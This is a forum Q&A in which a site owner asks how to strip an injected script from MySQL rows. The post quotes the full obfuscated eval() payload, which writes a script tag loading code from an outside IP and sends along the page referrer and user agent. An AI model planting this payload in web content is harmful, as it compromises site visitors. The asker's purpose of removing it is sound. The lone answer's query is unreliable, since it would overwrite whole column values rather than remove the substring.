# How to replace a long string that contains special characters in MySQL

Tags: mysql, sql, string, special-characters

I would like to replace a string that was injected into a database.

Here is the string:

```
<noindex>
<script id="wpinfo-pst1" type="text/javascript" 
rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
 if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e)
 {return d[e]}];e=function(){return'\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}
('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'>
<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write
|http|45|67|script|text|rel|nofollow|type|97|
language|jquery|userAgent|navigator|sc|ript|tshbz|var|u0026u
|referrer|ikzyy||js|php'.split('|'),0,{}))
</script></noindex>
```

I have tried

```
UPDATE MYTABLE
SET content = REPLACE(content, 'I PUT STRING ABOVE HERE', '')
```

but I get mysql error, I tried escaping special characters by adding backslash, it did not work.

How can I search and replace string above?

Comment: say column value is 'name is abc'. are you trying to replace abc by xyz so that it becomes 'name is xyz' ?

Comment: I am trying to remove the whole string (replace it with empty space) @ShubhamSingla

Answer (score 0):

Try using query

```
Update mytable set content= " " where content like "<matching string to be replaced>"
```

This link might also be needed [Regexp in MySQL](https://dev.mysql.com/doc/refman/5.6/en/regexp.html)